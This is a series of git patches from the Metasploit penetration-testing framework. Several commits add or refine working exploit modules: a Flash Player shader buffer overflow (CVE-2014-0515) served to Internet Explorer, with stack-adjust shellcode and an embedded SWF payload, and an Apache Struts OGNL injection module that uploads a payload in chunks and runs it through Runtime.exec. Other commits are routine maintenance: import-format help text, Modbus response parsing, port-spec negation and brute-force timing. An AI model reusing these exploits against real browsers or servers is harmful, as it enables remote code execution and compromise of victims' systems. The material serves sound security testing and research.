+ var i:uint = 0; + var sh:uint=1; + + while(i < array_code_vectors.length) + { + for(var u:String in shellcodeObj) + { + array_code_vectors[i][sh++] = Number(shellcodeObj[u]); + } + i++; + sh = 1; + } + } + } +}//package diff --git a/external/source/exploits/CVE-2014-0515/Graph_Shad.as b/external/source/exploits/CVE-2014-0515/Graph_Shad.as new file mode 100755 index 0000000000..c0e84dff5d --- /dev/null +++ b/external/source/exploits/CVE-2014-0515/Graph_Shad.as @@ -0,0 +1,10 @@ +package +{ + import mx.core.ByteArrayAsset; + + [Embed(source="binary_data", mimeType="application/octet-stream")] + public class Graph_Shad extends ByteArrayAsset + { + + } +} \ No newline at end of file diff --git a/external/source/exploits/CVE-2014-0515/binary_data b/external/source/exploits/CVE-2014-0515/binary_data new file mode 100755 index 0000000000000000000000000000000000000000..8d83cb55c9051e86159e7a3eeae6a1dc1997ddca GIT binary patch literal 2425 zcmeH}L2DCH5Xb+!Zx@9IT(6bDT098_lT`8KZWHk&=*gStn!Lbbx+%Mx(t6sHAHk!f zQSahew3Q-$9Hk#X|MT_*V?^;Hz2sdcGw;otncog?^2P!1dJVn&peU2kD1D}EKl15@zQHdYDW`W$n5>Wsz$)>DcY|xNdW8b9K4?Mc<;kgk8xMhqLH| z8|*(>E4kuu7JV@Leq2*KG zaIq!#GYI#;LQ%^8I`?ICm^cz&ArZSnY4S1qkBz@q@6#`k{rUZ7^hh4j^Wl*30+tRX zhbV=IizDF>ey({0CST$4@ZF~H_*mB&MzsvY{#PE>&z=vhzwvAPs7xFmvBV*dmgQkM z2p^yIZTL7@<{_Nc)e;Y$SHiR>v@9>fQFzOFax{Eg!#ltgh0DUZw)6Y^ zv|kkaRrUj?I!AX^5!)X}eBBS74)2L2e}2b!&RKpgeqX8kw|YEVkCAmf^M3FoKid!g KEC1!cC_e!DVj0E& literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb index ff8a3f4549..2d116975a8 100644 --- a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb +++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb @@ -93,7 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote tag = retrieve_tag(cli, request) profile = get_profile(tag) profile[:tried] = false unless profile.nil? # to allow request the swf - print_status("showme the money") send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb new file mode 100644 index 0000000000..6b05ab51e3 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Shader Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in Adobe Flash Player. The + vulnerability occurs in the flash.Display.Shader class, when setting specially + crafted data as its bytecode, as exploited in the wild in April 2014. This module + has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over + Windows XP SP3, Windows 7 SP1 and Windows 8. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2014-0515'], + ['BID', '67092'], + ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'], + ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'EXITFUNC' => "thread" + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 28 2014", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 6b41a4e2d981970f943ac38086b69c76df6afd44 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 7 May 2014 17:39:22 -0500 Subject: [PATCH 257/853] Test Flash 13.0.0.182 --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index 6b05ab51e3..43997895ef 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote :method => "LoadMovie", :os_name => Msf::OperatingSystems::WINDOWS, :ua_name => Msf::HttpClients::IE, - :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ } + :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => [ From 7da6a2c84cf3f804dacd59d260bad43308b3be1d Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 8 May 2014 02:26:51 -0500 Subject: [PATCH 258/853] Update db_import help with authoritative formats Taken from import_filetype_detect in lib/msf/core/db.rb. [SeeRM #8799] --- lib/msf/ui/console/command_dispatcher/db.rb | 24 +++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index bf3f39eb3d..e16c68ac1a 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1304,26 +1304,38 @@ class Db print_line print_line "Filenames can be globs like *.xml, or **/*.xml which will search recursively" print_line "Currently supported file types include:" - print_line " Acunetix XML" + print_line " Acunetix" print_line " Amap Log" print_line " Amap Log -m" - print_line " Appscan XML" + print_line " Appscan" print_line " Burp Session XML" - print_line " Foundstone XML" + print_line " CI" + print_line " Foundstone" + print_line " FusionVM XML" + print_line " IP Address List" print_line " IP360 ASPL" print_line " IP360 XML v3" + print_line " Libpcap Packet Capture" + print_line " Metasploit PWDump Export" + print_line " Metasploit XML" + print_line " Metasploit Zip Export" print_line " Microsoft Baseline Security Analyzer" - print_line " Nessus NBE" - print_line " Nessus XML (v1 and v2)" - print_line " NetSparker XML" print_line " NeXpose Simple XML" print_line " NeXpose XML Report" + print_line " Nessus NBE Report" + print_line " Nessus XML (v1)" + print_line " Nessus XML (v2)" + print_line " NetSparker XML" + print_line " Nikto XML" print_line " Nmap XML" print_line " OpenVAS Report" + print_line " OpenVAS XML" print_line " Outpost24 XML" print_line " Qualys Asset XML" print_line " Qualys Scan XML" print_line " Retina XML" + print_line " Spiceworks CSV Export" + print_line " Wapiti XML" print_line end From b50b3820a0b3e5832b9c9aae2961009e32b1d133 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 8 May 2014 02:53:02 -0500 Subject: [PATCH 259/853] Update core/db.rb comments 'n' stuff --- lib/msf/core/db.rb | 39 ++++++++++++++++++++++++++++++++++----- 1 file changed, 34 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index da187491fd..a81cf2b55d 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -2943,10 +2943,39 @@ class DBManager self.send "import_#{ftype}".to_sym, args, &block end - # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml - # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog - # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml - # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml + # Returns one of the following: + # + # :acunetix_xml + # :amap_log + # :amap_mlog + # :appscan_xml + # :burp_session_xml + # :ci_xml + # :foundstone_xml + # :fusionvm_xml + # :ip360_aspl_xml + # :ip360_xml_v3 + # :ip_list + # :mbsa_xml + # :msf_pwdump + # :msf_xml + # :nessus_nbe + # :nessus_xml + # :nessus_xml_v2 + # :netsparker_xml + # :nexpose_rawxml + # :nexpose_simplexml + # :nikto_xml + # :nmap_xml + # :openvas_new_xml + # :openvas_xml + # :outpost24_xml + # :qualys_asset_xml + # :qualys_scan_xml + # :retina_xml + # :spiceworks_csv + # :wapiti_xml + # # If there is no match, an error is raised instead. def import_filetype_detect(data) @@ -3114,7 +3143,7 @@ class DBManager return :netsparker_xml elsif (firstline.index("# Metasploit PWDump Export")) # then it's a Metasploit PWDump export - @import_filedata[:type] = "msf_pwdump" + @import_filedata[:type] = "Metasploit PWDump Export" return :msf_pwdump end From 102eb8527736dbf3205c4e12c1a356acc3713435 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 8 May 2014 03:05:49 -0500 Subject: [PATCH 260/853] Update CommandDispatcher::Db spec --- spec/lib/msf/ui/command_dispatcher/db_spec.rb | 26 ++++++++++++++----- 1 file changed, 19 insertions(+), 7 deletions(-) diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb index 5b058d4fb3..52baca5d93 100644 --- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb @@ -221,26 +221,38 @@ describe Msf::Ui::Console::CommandDispatcher::Db do "Usage: db_import [file2...]", "Filenames can be globs like *.xml, or **/*.xml which will search recursively", "Currently supported file types include:", - " Acunetix XML", + " Acunetix", " Amap Log", " Amap Log -m", - " Appscan XML", + " Appscan", " Burp Session XML", - " Foundstone XML", + " CI", + " Foundstone", + " FusionVM XML", + " IP Address List", " IP360 ASPL", " IP360 XML v3", + " Libpcap Packet Capture", + " Metasploit PWDump Export", + " Metasploit XML", + " Metasploit Zip Export", " Microsoft Baseline Security Analyzer", - " Nessus NBE", - " Nessus XML (v1 and v2)", - " NetSparker XML", " NeXpose Simple XML", " NeXpose XML Report", + " Nessus NBE Report", + " Nessus XML (v1)", + " Nessus XML (v2)", + " NetSparker XML", + " Nikto XML", " Nmap XML", " OpenVAS Report", + " OpenVAS XML", " Outpost24 XML", " Qualys Asset XML", " Qualys Scan XML", - " Retina XML" + " Retina XML", + " Spiceworks CSV Export", + " Wapiti XML" ] end end From 281b0008056d57f5b5e4c9f295ada1da13311c92 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 8 May 2014 10:18:19 -0500 Subject: [PATCH 261/853] Typo fix for #3339 --- lib/msf/ui/console/command_dispatcher/core.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d59f853289..89fbc0d903 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -395,7 +395,7 @@ class Core "Taking notes in notepad? Have Metasploit Pro track & report\nyour progress and findings -- learn more on http://rapid7.com/metasploit", "Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro\nLearn more on http://rapid7.com/metasploit", "Love leveraging credentials? Check out bruteforcing\nin Metasploit Pro -- learn more on http://rapid7.com/metasploit", - "Save 45% of your time on large engagements with Metaspsloit Pro\nLearn more on http://rapid7.com/metasploit", + "Save 45% of your time on large engagements with Metasploit Pro\nLearn more on http://rapid7.com/metasploit", "Validate lots of vulnerabilities to demonstrate exposure\nwith Metasploit Pro -- Learn more on http://rapid7.com/metasploit" ] banner << content.sample # Ruby 1.9-ism! From ee303aa34ee2a8ac5b70da7a25eaf0dbef57ddf6 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 8 May 2014 10:26:49 -0500 Subject: [PATCH 262/853] Add missing formats in lib/msf/core/db.rb comment Found outside big if block. Ugh. --- lib/msf/core/db.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb index a81cf2b55d..33db0e6a54 100644 --- a/lib/msf/core/db.rb +++ b/lib/msf/core/db.rb @@ -2956,9 +2956,11 @@ class DBManager # :ip360_aspl_xml # :ip360_xml_v3 # :ip_list + # :libpcap # :mbsa_xml # :msf_pwdump # :msf_xml + # :msf_zip # :nessus_nbe # :nessus_xml # :nessus_xml_v2 From 25f13eac3781190f5c20f7002240f73ca94dc8f8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 8 May 2014 10:44:53 -0500 Subject: [PATCH 263/853] Clean a little response parsing --- .../auxiliary/scanner/scada/modbusclient.rb | 39 +++++++++++-------- 1 file changed, 23 insertions(+), 16 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index b6f83c835c..7fd40ddcee 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -28,8 +28,9 @@ class Metasploit3 < Msf::Auxiliary ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ], ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ], ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ], - ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ], - ] + ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ] + ], + 'DefaultAction' => 'READ_REGISTER' )) register_options( @@ -112,16 +113,19 @@ class Metasploit3 < Msf::Auxiliary end def read_coil - @function_code = 1 + @function_code = 0x1 print_status("Sending READ COIL...") response = send_frame(make_read_payload) if response.nil? print_error("No answer for the READ COIL") return - elsif response.unpack("C*")[-2] == 129 + elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) + elsif response.unpack("C*")[7] == @function_code + value = response[9].unpack("c")[0] + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : #{value}") else - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) + print_error("Unknown answer") end end @@ -131,12 +135,13 @@ class Metasploit3 < Msf::Auxiliary response = send_frame(make_read_payload) if response.nil? print_error("No answer for the READ REGISTER") - return - elsif response.unpack("C*")[-2] == 131 + elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) + elsif response.unpack("C*")[7] == @function_code + value = response[9..10].unpack("n")[0] + print_good("Register value at address #{datastore['DATA_ADDRESS']} : #{value}") else - value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') - print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + print_error("Unknown answer") end end @@ -154,11 +159,12 @@ class Metasploit3 < Msf::Auxiliary response = send_frame(make_write_coil_payload(data)) if response.nil? print_error("No answer for the WRITE COIL") - return - elsif response.unpack("C*")[-2] == 133 + elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) - else + elsif response.unpack("C*")[7] == @function_code print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") end end @@ -172,18 +178,19 @@ class Metasploit3 < Msf::Auxiliary response = send_frame(make_write_register_payload(datastore['DATA'])) if response.nil? print_error("No answer for the WRITE REGISTER") - return - elsif response.unpack("C*")[-2] == 134 + elsif response.unpack("C*")[7] == (0x80 | @function_code) handle_error(response) - else + elsif response.unpack("C*")[7] == @function_code print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") + else + print_error("Unknown answer") end end def run @modbus_counter = 0x0000 # used for modbus frames connect - case datastore['ACTION'] + case action.name when "READ_COIL" read_coil when "READ_REGISTER" From 66252ba9e52c4855e800f6aaa650cafd552bdf27 Mon Sep 17 00:00:00 2001 From: Lutz Wolf Date: Thu, 8 May 2014 21:35:35 +0200 Subject: [PATCH 264/853] support negation in portspec --- lib/rex/socket.rb | 26 ++++++++++++++++++++++---- 1 file changed, 22 insertions(+), 4 deletions(-) diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb index e68a0263a6..ba510c5a80 100644 --- a/lib/rex/socket.rb +++ b/lib/rex/socket.rb @@ -505,14 +505,24 @@ module Socket end # - # Converts a port specification like "80,21-23,443" into a sorted, - # unique array of valid port numbers like [21,22,23,80,443] + # Converts a port specification like "80,21-25,!24,443" into a sorted, + # unique array of valid port numbers like [21,22,23,25,80,443] # def self.portspec_to_portlist(pspec) ports = [] + remove = [] # Build ports array from port specification pspec.split(/,/).each do |item| + item.strip! + + if item.starts_with? '!' then + negate = true + item.delete! '!' + else + negate = false + end + start, stop = item.split(/-/).map { |p| p.to_i } start ||= 0 @@ -520,11 +530,19 @@ module Socket start, stop = stop, start if stop < start - start.upto(stop) { |p| ports << p } + if negate then + start.upto(stop) { |p| remove << p } + else + start.upto(stop) { |p| ports << p } + end + end + + if ports.empty? and not remove.empty? then + ports = 1.upto 65535 end # Sort, and remove dups and invalid ports - ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 } + ports.sort.uniq.delete_if { |p| p < 1 or p > 65535 or remove.include? p } end # From e7b7af2f750af3b62ed31dbe5d5b8d04d1571f30 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 8 May 2014 22:15:52 +0200 Subject: [PATCH 265/853] fixed apache struts module --- .../multi/http/struts_code_exec_parameters.rb | 21 ++++++++++--------- 1 file changed, 11 insertions(+), 10 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index 1db90c817f..c693825cbc 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -67,25 +67,26 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(8080), OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), - OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/blank-struts2/login.action"]), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) ], self.class) end - def execute_command(cmd, opts = {}) - inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" - inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" - inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) - inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - uri.gsub!(/INJECT/,inject) # append the injection string + def parameter + datastore['PARAMETER'] + end + + def execute_command(cmd) + inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" + inject << "= new java.lang.Boolean(true),#{cmd})('meh')" + uri = normalize_uri(datastore['TARGETURI']) resp = send_request_cgi({ 'uri' => uri, 'version' => '1.1', 'method' => 'GET', + 'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' } }) - return resp #Used for check function. + return resp end def exploit From a3fff5401f43f21a5491c426a2f2ca154874ad0c Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Thu, 8 May 2014 23:05:41 +0200 Subject: [PATCH 266/853] more code cleanup --- .../multi/http/struts_code_exec_parameters.rb | 42 +++++++++---------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index c693825cbc..d7fcb49034 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Meder Kydyraliev', # Vulnerability Discovery and PoC 'Richard Hicks ', # Metasploit Module - 'mihi' #ARCH_JAVA support + 'mihi', #ARCH_JAVA support + 'Christian Mehlmauer' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => @@ -66,8 +67,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8080), - OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), - OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/blank-struts2/login.action"]), + OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.','username']), + OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']), OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) ], self.class) end @@ -86,56 +87,56 @@ class Metasploit3 < Msf::Exploit::Remote 'method' => 'GET', 'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' } }) - return resp + resp end def exploit #Set up generic values. - @payload_exe = rand_text_alphanumeric(4+rand(4)) + payload_exe = rand_text_alphanumeric(4 + rand(4)) pl_exe = generate_payload_exe - append = 'false' + append = false #Now arch specific... case target['Platform'] when 'linux' - @payload_exe = "/tmp/#{@payload_exe}" - chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" - exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" + payload_exe = "/tmp/#{payload_exe}" + chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))" + exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))" when 'java' - @payload_exe << ".jar" + payload_exe << ".jar" pl_exe = payload.encoded_jar.pack - exec_cmd = "" + exec_cmd = '' exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," exec_cmd << "#q.setAccessible(true),#q.set(null,true)," exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," exec_cmd << "#q.setAccessible(true),#q.set(null,false)," - exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," + exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{payload_exe}').toURI().toURL()})," exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" when 'windows' - @payload_exe = "./#{@payload_exe}.exe" - exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" + payload_exe = "./#{payload_exe}.exe" + exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')" else fail_with(Failure::NoTarget, 'Unsupported target platform!') end #Now with all the arch specific stuff set, perform the upload. #109 = length of command string plus the max length of append. - sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length + sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length chunk_length = 2048 - sub_from_chunk - chunk_length = ((chunk_length/4).floor)*3 + chunk_length = ((chunk_length/4).floor) * 3 while pl_exe.length > chunk_length - java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) + java_upload_part(pl_exe[0,chunk_length], payload_exe, append) pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] append = true end - java_upload_part(pl_exe,@payload_exe,append) + java_upload_part(pl_exe, payload_exe, append) execute_command(chmod_cmd) if target['Platform'] == 'linux' execute_command(exec_cmd) - register_files_for_cleanup(@payload_exe) + register_files_for_cleanup(payload_exe) end - def java_upload_part(part, filename, append = 'false') + def java_upload_part(part, filename, append = false) cmd = "" cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," @@ -152,7 +153,6 @@ class Metasploit3 < Msf::Exploit::Remote t2 = Time.now delta = t2 - t1 - if response.nil? return Exploit::CheckCode::Safe elsif delta < sleep_time From 58c46cc73d529238a99bb6ac6f4702a8243d833c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 8 May 2014 16:48:42 -0500 Subject: [PATCH 267/853] Add compilation instructions for the AS --- external/source/exploits/CVE-2014-0515/Graph.as | 1 + 1 file changed, 1 insertion(+) diff --git a/external/source/exploits/CVE-2014-0515/Graph.as b/external/source/exploits/CVE-2014-0515/Graph.as index 4982447997..ab64eb90cd 100755 --- a/external/source/exploits/CVE-2014-0515/Graph.as +++ b/external/source/exploits/CVE-2014-0515/Graph.as @@ -1,3 +1,4 @@ +//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf package { import flash.display.Sprite; import flash.utils.ByteArray; From 53fde675e782e9c29648f1baf6529f6239a72463 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Fri, 9 May 2014 10:38:19 +0200 Subject: [PATCH 268/853] randomize meh parameter --- modules/exploits/multi/http/struts_code_exec_parameters.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_parameters.rb b/modules/exploits/multi/http/struts_code_exec_parameters.rb index d7fcb49034..ff29678af5 100644 --- a/modules/exploits/multi/http/struts_code_exec_parameters.rb +++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb @@ -78,14 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote end def execute_command(cmd) + junk = Rex::Text.rand_text_alpha(6) inject = "(#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" - inject << "= new java.lang.Boolean(true),#{cmd})('meh')" + inject << "= new java.lang.Boolean(true),#{cmd})('#{junk}')" uri = normalize_uri(datastore['TARGETURI']) resp = send_request_cgi({ 'uri' => uri, 'version' => '1.1', 'method' => 'GET', - 'vars_get' => { parameter => inject, "z[(#{parameter})(meh)]" => 'true' } + 'vars_get' => { parameter => inject, "z[(#{parameter})(#{junk})]" => 'true' } }) resp end From a71be330919c91b467c7fff6bc608eb8fa6a3233 Mon Sep 17 00:00:00 2001 From: nstarke Date: Fri, 9 May 2014 14:39:34 +0000 Subject: [PATCH 269/853] Adjusting status message to be based on time Previously the status message timing was determined by the number of pairs left to process. I have adjusted the code to rely on Time.now in order to consistently print a message out every 60 seconds. --- lib/msf/core/auxiliary/auth_brute.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb index 00140d8a79..dbe155321c 100644 --- a/lib/msf/core/auxiliary/auth_brute.rb +++ b/lib/msf/core/auxiliary/auth_brute.rb @@ -331,6 +331,8 @@ module Auxiliary::AuthBrute creds = [ [], [], [], [] ] # userpass, pass, user, rest remaining_pairs = combined_array.length # counter for our occasional output + interval = 60 # seconds between each remaining pair message reported to user + next_message_time = Time.now + interval # initial timing interval for user message # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list. # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank -- # maybe (and it's often) they wanted a blank. One more credential won't kill @@ -345,11 +347,12 @@ module Auxiliary::AuthBrute else creds[3] << pair end - if remaining_pairs % 500000 == 0 + if Time.now > next_message_time 